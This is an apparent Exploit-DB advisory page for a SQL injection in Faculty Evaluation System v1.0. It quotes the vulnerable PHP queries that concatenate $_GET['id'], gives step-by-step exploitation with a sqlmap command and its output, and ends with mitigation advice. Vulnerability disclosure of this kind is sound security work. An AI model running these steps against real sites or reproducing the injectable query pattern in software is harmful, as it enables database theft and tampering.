header-logo
Suggest Exploit
vendor:
Faculty Evaluation System
by:
Andrey Stoykov
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Faculty Evaluation System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2022
2023

Faculty Evaluation System v1.0 – SQL Injection

The Faculty Evaluation System v1.0 is vulnerable to SQL Injection. The vulnerability exists in the 'edit_evaluation' file and the 'view_faculty.php' file. The SQL Injection allows an attacker to manipulate the SQL queries and potentially extract or modify sensitive data.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL Injection attacks. Regular security audits and penetration testing can also help identify and address such vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: Windows Server 2022


SQLi #1

File: edit_evaluation

Line #4
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]


SQLi #2

File: view_faculty.php

Line #4

// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]


Steps to Exploit:

1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap


sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint

[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.6.49
               fork fingerprint: MariaDB
[...]

Navigation

Suggest Exploit

Services By CQR